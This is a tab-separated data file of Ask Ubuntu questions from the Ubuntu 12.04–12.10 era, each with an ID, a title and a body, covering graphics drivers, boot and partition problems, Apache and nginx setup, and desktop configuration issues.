221560	has anyone gotten vmware workstation 9.0.1 working with vmxwrapper / nvidia optimus ?	i have an optimus laptop and am desperate to be able to use my discrete gpu with virtual machines . recently , a project called vmxwrapper has come out to allow this . however , i get the following issues : using workstation 9.0.1 / ubuntu 12.10 ( amd64 ) bumblebee fully working , vmxwrapper installed according to instructions . vmware log : http : //pastebin.com/qbjaeb3a relevant information from running : libgl_debug=verbose optirun vmware -x vmware/windows\ 7\ x64/windows\ 7\ x64\ ( 2 ) .vmx libgl : screen 0 does not appear to be dri2 capable libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl error : failed to load driver : swrast 2012-11-24 14:24:31 6676 no printer configured or none available 2012-11-24 14:24:31 6684 adaptor daemon booted 2012-11-24 14:24:31 6687 connector `` vmlocal '' booted 2012-11-24 14:24:36 6684 adaptor daemon shut down 2012-11-24 14:24:36 6687 connector `` vmlocal '' shut down mainly , the point is that it 's trying to load swrast as opposed to the virtualgl , i think . any advice would be great ! if anyone has this working , please let me know .
221561	creating folder in new hdd	i just bought a brand new 2tb harddrive mainly for storage . i formatted it as ext2 . however , i can not create a folder inside the harddrive , nor can i move files to the harddrive
221564	how to change driver to nvidia-current ?	alright , i 've already installed the nvidia drivers a while ago and had to deactivate them again because i could n't change the resolution . now i would like to activate them again for hdmi support . the additional drivers window says that the driver nvidia-current is activated , but not in use . what is needed to use it as the primary driver again ? i 've already checked the internet , but could n't find any help . edit : if i run nvidia-xconfig and relog , my resolution freezes at 640x480 and i ca n't change it anywhere . heres the content of my xorg.conf , since that seems to be causing the problem . as soon as i delete the xorg.conf , everything is back to normal again , but without nvidia drivers . xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.64 ( buildmeister @ swio-display-x86-rhel47-12 ) tue oct 30 12:04:46 pdt 2012 section `` serverlayout '' identifier `` default layout '' screen `` default screen '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` keyboard '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` configured video device '' driver `` nvidia '' endsection section `` screen '' identifier `` default screen '' device `` configured video device '' monitor `` monitor0 '' subsection `` display '' modes `` nvidia-auto-select '' endsubsection endsection
221565	software center subscription is for quantal even though i 'm on precise ?	i noticed that the deb line for eufloria hd from the humble bundle in /etc/apt/sources.list.d is from quantal , but i 'm running precise ... why is that ? i guess they uploaded it for quantal only , or is this a bug ?
221569	random greyed unresponsive screen on netbook	i love my asus eee pc 1000 ubuntu 12.04 netbook , but i have a little problem . as i use it , the screen will randomly turn grey and become unresponsive . i can then only wait , until perhaps 10-60 secs . later , when i can interact again . only the bar at the top of my screen retains its colour throughout . i thought it might be firefox , as i have a lot of tabs open . i installed chromium , used it instead , and the problem remained . a while back i upgraded from 1 to 2 gb ram . so , i thought recently , maybe i should increase the swap-space . i have 738mb of 7.2gb free on root ; and 2gb of 28gb free on my home drive . i bought a 32 gb sd card and assigned 4gb to swap space . cat /proc/swaps reports that the partition is being used . alas the problem remains . does anyone know what 's wrong with my machine ? the sd card has changed my machine somewhat , but the greying still happens . i ran free -m shortly after another episode , and received : total used free shared buffers cached mem : 2004 1731 272 0 370 769 -/+ buffers/cache : 591 1412 swap : 4073 0 4073 update : using 'top ' , i can see that compiz uses about 43 % of the cpu ( # 1 position ) when the greying occurs . after the greying , compiz drops back down to its usual 8 % of cpu . update : if i log in to ubuntu using the unity2d option ( the option pops up when you press the ubuntu logo on the login screen ) instead of unity , compiz is not loaded , and the problem disappears . now firefox 's plugin-container is annoying me . i used about : config and changed dom.ipc.plugins.enabled to false . now firefox crashes often . could it finally be time for chromium ? alas i love firefox 's rss support .
221572	create .desktop file as shorcut to a folder in lubuntu lxde	what is the `` exec= '' part of a desktop configuration file for this ? i guess i should mention file manager but how exactly ?
221576	screen turns off after log in on main account.turns off after log out from guest account . ( 12.10 new install )	i 'm really lost and to be honest really tired.i just got an ssd since my 80gb hdd was showing it 's age.i had to reinstall it like 3 times and i do n't know what to do anymore and now not even my old hdd will boot ( really nice timing ) . so as in the title , it boots , it reaches the log in screen and after i enter my password and press enter i can see my wallpaper for 1sec and then the screen goes black.5 seconds later the monitor acts like the pc is off .
221581	how can i do a cdromupgrade if 12.10 does not have an alternate iso ?	canonical dropped support to the alternate iso 's and they are not listed in the downloads page , how can i do a cd rom upgrade now ?
221584	iso image too big for a cd	i downloaded the file for ubuntu 12.10 . it is a cd iso image with size of 753 mbytes . that exceeds the capacity of a cd-r disk , which is 700 mbytes . so what can be done to resolve this ? is it intended that the downloaded file be converted to dvd image form and then burned on a writable dvd ?
221591	i attempted to install cuda drivers , and now almost everything is broken	i tried to install cuda tookit 5.0 on ubuntu 12.04 and the installation proceeded ok. after rebooting however , all i get is a terminal login . i 've attempted to start the display manager with sudo start lightdm and it says all ok , but just hangs the prompt when it finishes loading without ever starting any display manager . sudo start gdm just flickers and goes back to the prompt . there is no network connection on the machine either . it usually connects to a wireless network with remembered credentials . what can i do to recover the machine ?
221594	grub rescue : unknown filesystem error while booting from usb	i 'm currently using ubuntu 12.04 which has grub2 and wanted to install windows 8 from my usb , i also created a bootable usb flash drive using windows 7 dvd download tool , the problem is - i formatted my hard drive and whenever i try to boot from the flash drive i get an error `` error : unknown filesystem '' and gives grub rescue prompt , since my dvd drive is not working the only way for me to install win8 is from usb , can anybody help me with this ?
221595	why is gnome-shell thinking my `` d '' key minimizes all windows ?	i am on ubuntu 12.04 lts ( in gnome-shell ) and i am unable to use my `` d '' key . regular gnome-2 works perfectly fine , but for some reason i can not use my `` d '' key in gnome-3 . i recently installed it and have been trying to figure this out , but i have no clue what 's going on . i attempted to disable the keyboard shortcut that minimizes active windows , but that did not work . ( my only option right now is to use ctrl-v to paste my `` d '' s. ) on top of this , my arrow keys automatically move my windows and i can not move through text using them . what 's going on here , folks ? here 's the result of that comman ( ) [ apps/cheese ] wide-mode=false [ apps/onboard ] key-label-font='ubuntu' key-label-overrides= [ 'lwin : ? : super ' , 'rwin : ? : super ' ] layout='compact' schema-version='1.0' system-theme-associations= { 'default ' : 'ambiance ' , 'highcontrastinverse ' : 'highcontrastinverse ' , 'lowcontrast ' : 'lowcontrast ' , 'highcontrast ' : 'highcontrast ' } theme='/usr/share/onboard/themes/ambiance.theme' use-system-defaults=false xembed-onboard=true [ apps/onboard/theme-settings ] color-scheme='/usr/share/onboard/themes/aubergine.colors' key-fill-gradient=8.0 key-gradient-direction=-4.0 key-label-overrides= @ as [ ] key-size=99.0 key-stroke-gradient=32.0 key-style='gradient' roundrect-radius=30.0 [ apps/seahorse/windows/key-manager ] height=476 width=640 [ apps/shotwell/preferences/ui ] display-basic-properties=true events-sort-ascending=false show-welcome-dialog=true sidebar-position=228 [ apps/shotwell/preferences/window ] library-height=768 library-maximize=false library-width=1024 [ apps/update-manager ] first-run=false launch-time=1353760948 show-details=true window-height=518 window-width=840 [ ca/desrt/dconf-editor ] height=696 maximized=false width=1387 [ com/canonical/unity-2d ] average-bg-color= ' # e65051' [ com/canonical/unity-2d/launcher ] edge-responsiveness=0.20000000298023224 hide-mode=1 only-one-launcher=false [ com/ubuntu/update-notifier ] regular-auto-launch-interval=7 release-check-time=uint32 1353288984 [ desktop/unity/dash ] home-lens-ordering= [ 'applications.lens ' ] [ desktop/unity/launcher ] favorite-migration='3.2.10' favorites= [ 'gummi.desktop ' , 'glchess.desktop ' , '/usr/share/app-install/desktop/gnumeric-common : gnumeric.desktop ' , 'fbreader.desktop ' , 'paprefs.desktop ' , 'fraqtive.desktop ' , 'xaos.desktop ' ] [ desktop/unity/lenses/applications ] display-available-apps=false display-recent-apps=false [ org/gnome/deja-dup ] backend='u1' prompt-check='disabled' [ org/gnome/deja-dup/s3 ] folder= ' $ hostname' [ org/gnome/desktop/a11y/applications ] screen-keyboard-enabled=false [ org/gnome/desktop/background ] color-shading-type='solid' picture-options='none' picture-uri= '' primary-color= ' # 000000000000' secondary-color= ' # efef29292929' [ org/gnome/desktop/interface ] cursor-blink-time=1000 cursor-size=5 cursor-theme='dmz-black' gtk-color-scheme='selected_bg_color : # aa0011 ; ' gtk-key-theme='default' toolkit-accessibility=false [ org/gnome/desktop/media-handling ] autorun-x-content-ignore= [ 'x-content/image-dcf ' , 'x-content/audio-player ' ] autorun-x-content-open-folder= @ as [ ] autorun-x-content-start-app= [ 'x-content/unix-software ' , 'x-content/image-dcf ' , 'x-content/audio-player ' ] [ org/gnome/desktop/screensaver ] embedded-keyboard-command='onboard -- xid' embedded-keyboard-enabled=true lock-delay=uint32 0 lock-enabled=false [ org/gnome/desktop/session ] idle-delay=uint32 0 [ org/gnome/desktop/wm/preferences ] button-layout= '' num-workspaces=2 visual-bell=true [ org/gnome/eog/ui ] image-gallery=false sidebar=false statusbar=true toolbar=true [ org/gnome/eog/view ] background-color= ' # 000000' use-background-color=true [ org/gnome/evince/default ] window-ratio= ( 1.3725490196078431 , 1.2601010101010102 ) [ org/gnome/file-roller/dialogs/extract ] overwrite=true recreate-folders=true skip-newer=false [ org/gnome/file-roller/listing ] list-mode='as-folder' name-column-width=250 show-path=false sort-method='name' sort-type='ascending' [ org/gnome/file-roller/ui ] sidebar-width=200 window-height=480 window-width=600 [ org/gnome/gedit/plugins ] active-plugins= [ 'zeitgeistplugin ' , 'modelines ' , 'spell ' , 'docinfo ' , 'time ' , 'filebrowser ' ] [ org/gnome/gedit/plugins/filebrowser ] root='file : ///' tree-view=true virtual-root='file : ///home/u' [ org/gnome/gedit/preferences/editor ] auto-save-interval=uint32 10 editor-font='monospace 9' scheme='oblivion' use-default-font=false [ org/gnome/gedit/preferences/print ] print-font-body-pango='monospace 9' print-font-header-pango='sans 11' print-font-numbers-pango='sans 8' print-header=true print-line-numbers=uint32 0 print-syntax-highlighting=true print-wrap-mode='word' [ org/gnome/gedit/preferences/ui ] notebook-show-tabs-mode='always' statusbar-visible=true [ org/gnome/gedit/state/window ] bottom-panel-size=140 side-panel-active-page=228660812 side-panel-size=200 size= ( 442 , 988 ) state=128 [ org/gnome/glchess ] height=550 maximized=true piece-theme='simple' show-3d=false show-history=true show-move-hints=false show-numbering=true show-toolbar=false width=500 [ org/gnome/gnome-panel/layout ] object-id-list= [ 'menu-bar ' , 'indicators ' , 'show-desktop ' , 'window-list ' , 'workspace-switcher ' ] toplevel-id-list= [ 'top-panel ' , 'bottom-panel ' ] [ org/gnome/gnome-panel/layout/objects/indicators ] object-iid='indicatorappletcompletefactory : :indicatorappletcomplete' pack-index=0 pack-type='end' toplevel-id='top-panel' [ org/gnome/gnome-panel/layout/objects/menu-bar ] object-iid='panelinternalfactory : :menubar' pack-index=0 toplevel-id='top-panel' [ org/gnome/gnome-panel/layout/objects/show-desktop ] object-iid='wnckletfactory : :showdesktopapplet' pack-index=0 toplevel-id='bottom-panel' [ org/gnome/gnome-panel/layout/objects/window-list ] object-iid='wnckletfactory : :windowlistapplet' pack-index=1 toplevel-id='bottom-panel' [ org/gnome/gnome-panel/layout/objects/workspace-switcher ] object-iid='wnckletfactory : :workspaceswitcherapplet' pack-index=0 pack-type='end' toplevel-id='bottom-panel' [ org/gnome/gnome-panel/layout/toplevels/bottom-panel ] animation-speed='fast' auto-hide=false auto-hide-size=1 enable-arrows=true enable-buttons=false expand=true hide-delay=300 monitor=0 orientation='bottom' screen=0 size=24 unhide-delay=100 x=0 x-centered=false x-right=-1 y=1026 y-bottom=0 y-centered=false [ org/gnome/gnome-panel/layout/toplevels/top-panel ] animation-speed='fast' auto-hide=false auto-hide-size=1 enable-arrows=true enable-buttons=false expand=true hide-delay=300 monitor=0 orientation='top' screen=0 size=24 unhide-delay=100 x=0 x-centered=false x-right=-1 y=0 y-bottom=-1 y-centered=false [ org/gnome/gnome-screenshot ] border-effect='none' delay=2 include-border=false include-pointer=false last-save-directory='file : ///home/u/dropbox/public' [ org/gnome/gnome-system-monitor ] current-tab=1 height=495 show-all-fs=true view-as=1 width=725 x-position=874 y-position=422 [ org/gnome/gnome-system-monitor/disktreenew ] columns-order= [ 0 , 1 , 2 , 3 , 4 , 5 , 6 ] sort-col=1 sort-order=0 [ org/gnome/gnome-system-monitor/memmapstree ] sort-col=0 sort-order=0 [ org/gnome/gnome-system-monitor/openfilestree ] sort-col=0 sort-order=0 [ org/gnome/gnome-system-monitor/proctree ] col-0-width=345 col-1-width=57 col-12-width=40 col-15-width=82 col-22-width=97 col-8-width=70 columns-order= [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , 16 , 17 , 18 , 19 , 20 , 21 , 22 ] sort-col=15 sort-order=0 [ org/gnome/libgnomekbd/keyboard ] layouts= [ 'us ' ] options= @ as [ ] [ org/gnome/libgnomekbd/preview ] height=545 width=1284 x=210 y=131 [ org/gnome/nautilus/list-view ] default-column-order= [ 'name ' , 'size ' , 'type ' , 'date_modified ' , 'date_accessed ' , 'group ' , 'where ' , 'mime_type ' , 'octal_permissions ' , 'owner ' , 'permissions ' ] default-visible-columns= [ 'name ' , 'size ' , 'type ' , 'date_modified ' ] [ org/gnome/nautilus/preferences ] always-use-location-entry=true enable-delete=true show-advanced-permissions=true show-hidden-files=true [ org/gnome/nautilus/window-state ] geometry='800x550+0+0' maximized=false start-with-sidebar=true [ org/gnome/rhythmbox/library/source ] show-browser=true sorting= ( 'artist ' , true ) [ org/gnome/rhythmbox/player ] volume=1.0 [ org/gnome/rhythmbox/plugins ] active-plugins= [ 'generic-player ' , 'daap ' , 'ubuntuone ' , 'power-manager ' , 'audioscrobbler ' , 'mmkeys ' , 'cd-recorder ' , 'audiocd ' , 'rb ' , 'mtpdevice ' , 'ipod ' , 'notification ' , 'iradio ' , 'artdisplay ' , 'mpris ' , 'artsearch ' , 'dbus-media-server ' ] seen-plugins= [ 'daap ' , 'fmradio ' , 'ubuntuone ' , 'audioscrobbler ' , 'cd-recorder ' , 'pythonconsole ' , 'rb ' , 'rblirc ' , 'mtpdevice ' , 'rbzeitgeist ' , 'ipod ' , 'notification ' , 'lyrics ' , 'artdisplay ' , 'context ' , 'mpris ' , 'sendto ' , 'im-status ' , 'artsearch ' , 'magnatune ' , 'dbus-media-server ' , 'replaygain ' ] [ org/gnome/rhythmbox/plugins/audioscrobbler ] last.fmscrobbling-enabled=true libre.fmscrobbling-enabled=true [ org/gnome/rhythmbox/plugins/ipod/source ] show-browser=true sorting= ( 'artist ' , true ) [ org/gnome/rhythmbox/plugins/iradio ] initial-stations-loaded=true [ org/gnome/rhythmbox/plugins/iradio/source ] show-browser=true [ org/gnome/rhythmbox/podcast/source ] show-browser=true [ org/gnome/rhythmbox ] position= ( 0 , 27 ) [ org/gnome/rhythmbox/rhythmdb ] locations= [ 'file : ///home/u/music ' , 'file : ///home/u/.ubuntuone/purchased % 20from % 20ubuntu % 20one ' ] [ org/gnome/settings-daemon/peripherals/keyboard ] numlock-state='off' [ org/gnome/settings-daemon/peripherals/touchpad ] horiz-scroll-enabled=true scroll-method='two-finger-scrolling' [ org/gnome/settings-daemon/plugins/power ] critical-battery-action='shutdown' idle-dim-battery=true lid-close-battery-action='suspend' sleep-display-ac=0 sleep-display-battery=0 sleep-inactive-battery-timeout=3600 [ org/gnome/shell ] favorite-apps= [ 'nautilus.desktop ' , 'yelp.desktop ' ] [ org/gtk/settings/color-chooser ] selected-color= ( true , 0.93725490196078431 , 0.16078431372549021 , 0.16078431372549021 , 1.0 ) [ org/gtk/settings/file-chooser ] last-folder-uri= '' location-mode='path-bar' show-hidden=false show-size-column=true sort-column='name' sort-order='ascending' window-position= ( 0 , 184 ) window-size= ( 840 , 675 ) [ org/gwibber/state ] height=600 position-x=50 position-y=24 width=400 [ system/locale ] region='en_us.utf8' [ system/proxy ] use-same-proxy=false i see nothing relating to 'd ' . i went into org.gnome.desktop.wm.keybindings using dconf-editor and looked at my keyboard shortcuts . nothing is set to [ 'd ' ] . i have no clue why this is happening now that i 've seen the system is saying it 's not the keyboard shortcuts .
221598	my ubuntu installation directory is not bootable on my intel mac	i have a intel mac , i previously had linux mint , i wanted to switch to ubuntu i made a usb install disk using unetbootin and it boots fine , but i install it to my hard drive , but when i go to the boot menu of my mac it does not show up , only my usb does , i dont have a mac install anymore so i can not install refit any help is appreciated
221599	ubuntu 12.04 software upgrade does not show 12.10 upgrade	i start the software upgrade application , press check and ubuntu 12.04 software upgrade does not show 12.10 upgrade on top . the only way to upgrade seems via cd ? ? ? ? upgrading to 12.04 worked that way but not to 12.10 . thanks
221600	unable to open synaptic package manager in 12.04	i have synaptic package manager installed in my ubuntu 12.04 version . while locating the same in dash and by single clicking on it , i am not able to open the same .
221601	white border around icons	i am having a problem where there is a white square that is visible across every icon . i have attached a snapshot to show the problem . this problem arose while i was using gnome shell and the faience theme . i am using 12.10 , and have tried resetting the desktop to default unity and gnome 3 settings but it did not help .
221604	broke during upgrade ; what command do i use ?	during the upgrade to 12:10 it froze and i had to reboot . what do i do to reset apt and reinstall the broken things ?
221606	how can i get japanese , chinese and korean input to work properly on skype , amsn and other softwares	i have installed the packages for japanese ( anthy ) , and those for chinese and korean input . they work perfectly on most of the software that come with ubuntu , such as the libreoffice suite and the browsers , however , i can not input any of these three languages on skype , amsn or almost any software i have downloaded/installed myself . for example i have installed a japanese-english dictionary called tagaini jisho , and i can not input japanese on it ! i love ubuntu , except the issues i have been experincing when i want to use these language tools . can anybody please help me about this issue . thank you in advance . best regards
221607	how do i setup php+my sql development environment	how do i setup php + my sql development environment in ubuntu ?
221608	thinkpad hard-drive motion detection support	i am running ubuntu 12.04.1 lts on a thinkpad x220 . does ubuntu support the hard-drive `` motion detection '' features that i have always found on thinkpads , since i first got an x31 running windows xp ? ( e.g . detect tilts , park hard-drive heads , show detailed status , etc ? )
221610	how do i fix my resolution after directx install through steam ?	i 'm a bit long-winded so see bottom for quick version and specs . friendly hello : hello all on these askubuntu pages , i just recently built my own computer and decided to switch to ubuntu for the extra coolness . i 've been learning a lot through all this , and mostly been trying to figure out issues on my own ( read : google searches ) . however , i could n't seem to find others with this problem so i 've come here for help . detailed recount : so i just used wine and winetricks to install steam . all went well and it worked . then i went to trying a game out . i remembered that orcs must die ! worked from http : //www.steamgamesonlinux.com/ so i tried that out . after selecting to download it , that 's when the problem occurred . the screen suddenly zoomed in ! ! ! i think it 's the resolution right ? half the screen is cut off and i ca n't see parts of the right side of windows . my theory is that this is due to direct x being installed through steam , as steam automatically installed it as i chose to download the game . it did n't even ask me to install direct x or not ) : it all happened so fast . this all being said , the game works fine ! it looks a little strange , as if the resolution was off , but it plays just fine . what i did so far : restarted my computer . did n't work -_- researched steam installing directx on ubuntu then messing up resolution and could n't really find anything . researched uninstalling directx from ubuntu but only found uninstalling directx after having been installed with wine , not through steam . got mad and ate my feelings . tried `` xrandr -s 0 '' but it did n't do anything . ran xrandr alone and terminal showed this : screen 0 : minimum 8 x 8 , current 640 x 480 , maximum 16384 x 16384 dvi-i-0 connected 640x480+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 640x480 59.9*+ 320x240 120.1 dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) dp-0 disconnected ( normal left inverted right x axis y axis ) dvi-d-0 disconnected ( normal left inverted right x axis y axis ) dp-1 disconnected ( normal left inverted right x axis y axis ) about now i was mad so i played odin 's sphere then took a nap . back to it ! i entered the following : xrandr -- output dvi-i-0 -- mode 1024x768 but i was met with this message : xrandr : can not find mode 1024x768 i get the same messages for 800x600 , 1400x1050 , and seemingly any other combination of numbers . i then tried going into system settings then displays , then playing around in there . my resolution is set to 640x480 and there are no other options for me to choose from . rotation has normal , clockwise , counter clockwise , and 180 degrees . it 's set to normal and i have n't messed with that . launcher placement has unknown and all displays as its two options . it 's set to unknown , but moving it to all displays does n't seem to do anything . finally , when i click detect displays , nothing seems to happen . quick version : linux noob . steam installed with wine and winetricks . steam downloaded and installed game + directx . resolution messed up now ( i think ; pretty sure ) , ca n't fix it , very annoying , no idea what 's going on , halp ! specs : ubuntu version 12.04 wine version 1.4.1 have not changed any settings in wine using winetricks graphics card : http : //www.gigabyte.com/products/pro ... px ? pid=4361 # sp drivers : proprietary ( installing those were a lot of fun ) also let it be known that i have a dvi to vga cord running from my graphics card to my monitor . if any more information is needed i am ready to report . thank you : thanks a lot for your help and all the work you do to support noob ubuntuers like me ( :
221613	how to get nba 2k13 working	i am confused about how certain games can or can not be played on ubuntu . every sort of `` big market '' game available is not supported on linux . however , when looking on amazon , i stumbled across nba 2k13 in the linux games section . here is the link : http : //www.amazon.com/nba-2k13-windows-linux-pclinux-unix/dp/b007mminwq my question is , if i buy this game , can i just pop it in and it will give me installation instructions and then i can play , just like on windows 7 ? or will i have to do it some other way ?
221614	how to create apache alias ubuntu 12.10	i have installed the lamp on my ubuntu 12.10 . all are working correctly . but i want to create a alias like phpmyadmin i have created the folder root /home/user/dropbox/development/www/ and added the following lines in my apache2.conf file alias /dropbox `` /home/user/dropbox/development/www/ '' < directory `` /home/user/dropbox/development/www/ '' > options indexes followsymlinks order allow , deny allow from all < /directory > when i access it like localhost/dropbox , i received 403 error message . permission not denaid . how can i fix this easily
221617	install deb package with all dependencies in same folder ?	i need to install multiple deb files of same software from apt cache in another ubuntu installation . for example , i have all deb files of vlc in same folder ( /var/cache/apt/archives ) . i need to install vlc with all dependencies satisfied . i can not install it using dpkg -i vlc* because of dependencies . is there a solution to this . i have many software packgaes in my cache which i dont want to download again . please help..
221619	ca n't mount windows partition ?	when i try to open the windows partition from ubuntu i receive the error : unable to mount 55 gb filesystem error mounting : mount exited without exit code 13 : ntfs_mst_post_read_fixup_warn : magic : 0x04010400 size : 1024 usa_ofs : 1026 usa_count : 1026 : invalid argument record 6 has no file magic ( 0x4010400 ) failed to open inode file_bitmap : input/output error failed to mount '/dev/sda2 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more detail . additionally , i ca n't boot into windows . i 've tried updating it many times but it wo n't show up on grub . does anybody know what all this means ? and how i might fix it ?
221620	how to configure nginx for wordpress	i 've installed everything that is needed by wordpress i.e . nginx 1.2.5 ( built from source on /usr/local/nginx ) , php-fpm with other php packages and mysql via apt-get . i downloaded wordpress-3.4.2.zip and extracted it in /usr/local/nginx/html/blog . i 've created mysql database for wordpress with all privileges . when i visit localhost/blog from my browser i get 500 internal server error . is there any special configuration that needs to done in nginx for making wordpress work ?
221621	compiz 's memory utilization increasing	i have been running ubuntu 12.04 , 64 bit , on my amd desktop for quite some time . last few days , i have been seeing the memory utilization of compiz to be increasing . i normally do not shut down the computer , however , recently the memory utilization when no apps are running is about 1 gb . i started observing and maintaining memory utilization for various apps in the system monitor and compiz seems to be utilizing ~ 90 mb . when i checked it last about 24 hours ago , it was about 86 mb and when the computer reboots , it is about 84 mb . so clearly compiz is consuming more memory when the pc is running continuously . this pc is a generic pc @ home used for emails ( thunderbird ) , browsing ( mozilla firefox ) , chat ( skype , empathy - facebook , sip , gtalk , hotmail ) , youtube , shotwell for managing pictures and rhythmbox for music . - basically an ordinary user . no development or graphics software used . hardware configuration : amd athlon 260 dual core 3.2 ghz , 4 gb ram , 64 gb ssd for os and 1 tb sata for data , asus mobo with on board default graphics card being used , dell 24 `` monitor . os : ubuntu 12.04.01 , 64 bit , all latest patches installed . any help is gr8 .
221623	can i install ubuntu 12.10 on an acer aspire laptop ?	i just downloaded ubuntu 12.10 , and i want to install it on my acer aspire laptop . here 's my acer specifications : intel pentium dual core processor @ 1.86 ghz 2,5gb of ram 500gb hdd mobile intel graphics media accelerator x3100 my question is : can i install ubuntu 12.10 on my laptop with those specs ?
221625	dual boot windows 8 ubuntu	i finally managed to installed ubuntu . but i can not boot win 8 now . i searched on the forum and tried everything without any luck . here is the log from boot-repair : http : //paste.ubuntu.com/1389617/ @ lovinbuntu : here is the new url : http : //paste.ubuntu.com/1389617/
221628	ubuntu server 12.10 ( or 12.04 ) install wont start ( vm in esxi host )	i have a working esxi host running several other working ubuntu vms . i am attempting to install ubuntu on a new host . i have tried 12.10 and 12.04.1 both with the same result . after selecting the language if i select `` install ubuntu server '' or `` check disc for defects '' nothing happens . no error messages , the screen does n't go blank , it just sits at that menu and becomes unresponsive . i 've redownloaded the iso several times . there is no cd/dvd drive to fail ( i 'm virtually mounting the iso ) , i 've completely deleted and reacreated the vm and its disks several times and still running into the same issue . i tried the desktop version ( instead of the server version , and it gave me a input/output error when it started the install which pointed to either a bad cd/dvd drive / bad hard drive , neither of which should be possible ) i 've searched around but ca n't find anything on this issue . any thoughts ideas would be appreciated .
221634	apache 'you do n't have permission to access / on this server '	i just install apache2 on ubuntu , the default www directory is /var/www/ , i use ln to link it to '/media/software/program files/wamp/www/ ' at the windows directory , but the apache shows 'you do n't have permission to access / on this server ' , then i use 'sudo chmod -r 777 /media/software/program\ files/wamp/www/ ' to set the permission , but it did n't work , and nothing changed when i saw the permission in the preporties of the ' ... /wamp/www ' folder.so i want to know how can i change the www directory to ' ... /wamp/www ' as i also need to access this diretory in windows .
221644	quicker alternative to gnome-screenshot ? ( no animation ! , quick ! , no frills )	i want to take screenshots in ubuntu . this is normally no big problem with the standard gnome-screenshot program is working good . but just now i ran into trouble because i need to take a screenshot of some window which appears only for about 0.5 seconds . the problem is that the gnome-screenshot is using a ( from me at least disappreciated animation when used ... this fancy thing kind of delays all and i really can not manage to take the picture.. ) so what i need is a `` no frills '' `` down to the ground '' alternative to the gnome-screenshot . i really disklike the animation - now because it makes me so much trouble . i also hate it that there appears to be no way to disable it after all . everybody is forced to accept this animation that looks like `` a flash light is going on '' . i am not against being fancy ... but this animation in gnome-screenshot is impacting/reducing its functionality . indeed in my case the shortly appearing window hides when loosing focus . the animaiton -as i assume- triggers the `` loosing of focus '' . so because of the animation i can not take the screenshot . anyhow i have looked for `` less frills '' alternatives and i have found that shutter is a programme that commes with quite some baggage.. but maybe somebody knows a very light-weight programm that serves the very sinple ( do nothing else ) purpose of just taking a screenshot ...
221651	is my swap encrypted or not ?	i chose to encrypt the home folder while installing lubuntu 12.10 ( 64-bit ) , but after that , sometimes i get error that the system `` can not find /dev/mapper/cryptswap1 wait for mount or cancel at splash screen '' . then , lubuntu starts without any problems . blkid shows /dev/mapper/cryptswap1 : uuid= '' fce3ef14-a9c6-45ac-81f5-18ff415851b0 '' type= '' swap '' that means swap is encrypted , but if i go to gparted , it shows an unknown partition with a red exclamation mark for swap .
221652	upgrading from lts to lts	i am running linux 10.04 ( lucid ) on my laptop . my update manager does not show upgrade to 12.04 option . i have checked all the settings as posted in previous queries ( changing options is update manager ) using -d in update etc . but still i am unable to resolve it . i access internet using a proxy i hope that does not matter .
221653	`` misaligned partition '' - should i do repartition ( how ? )	tried to install ubuntu 12.04 from usb-stick alongside the existing win7 os 64bit , and now i 'm not sure if install was completely successful : disk utility tool claims that the extended partition ( which contains ubuntu partition and swap ) is `` misaligned '' and recommends repartition . what should i do , and if should i do this repartition , how to do it ( especially if i would like not to lose the data on win7 partition ) ? background info : a considerably new thinkpad laptop ( uefi bios , if that matters ) . before install there were already a `` system_drv '' partition , the main windows partition and a lenovo recovery partition ( all ntfs ) . now the table looks like this : system_drv ( sda1 ) , windows ( sda2 ) , extended ( sda4 ) ( which contains linux ( sda5 ; ext4 ) and swap ( sda6 ) ) and recovery ( sda3 ) . disk utility tool gives a message as follows when i select ext : `` the partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested . '' there were couple of problems during the install , which i describe below , in the case they happen to be relevant . installer claimed that it recognized existing os'es fine , so i checked the corresponding option during the install . next , when it asked me how to allocate the disk space , the first weird thing happened : the installer give me a graphical `` slide '' allocate disk space for pre-existing win7 os and new ubuntu ... but it did not inform me which partition would be for ubuntu and which for windows . ..well , i decided to go with the setting installer proposed . ( not sure if this is relevant , but i guess i 'd better mention it anyway - the previous partition tools have been more self-explanatory ... ) after the install ( which reported no errors ) , grub/ubuntu refused to boot . luckily this problem was quite straightforwardly resolved with live-ubuntu-usb and boot-repair ( `` recommended repair '' worked just fine ) . after all this hassle i decided to check the partition table `` just to be sure '' - and the disk utility gives the warning message i described . i checked my disk specs on hitachi/hgst website , and yes , it 's advanced format ( `` advanced format , 512-byte emulation '' ) . also , fdisk gives me the following : device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sda2 3074048 523241959 260083956 7 hpfs/ntfs/exfat /dev/sda3 939907072 976771071 18432000 7 hpfs/ntfs/exfat /dev/sda4 523243518 939907071 208331777 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 523243520 932153343 204454912 83 linux /dev/sda6 932155392 939907071 3875840 82 linux swap / solaris apparently sda4 ( extended ) partition is off by 2 bytes ( sda4 starts on 523243518 , sda5 523243520 ) , but if i understood correctly , this should not be a problem , as the logical partition sda5 seems to be ok ( ? ) . in other words , there should be no need for repartitioning ?
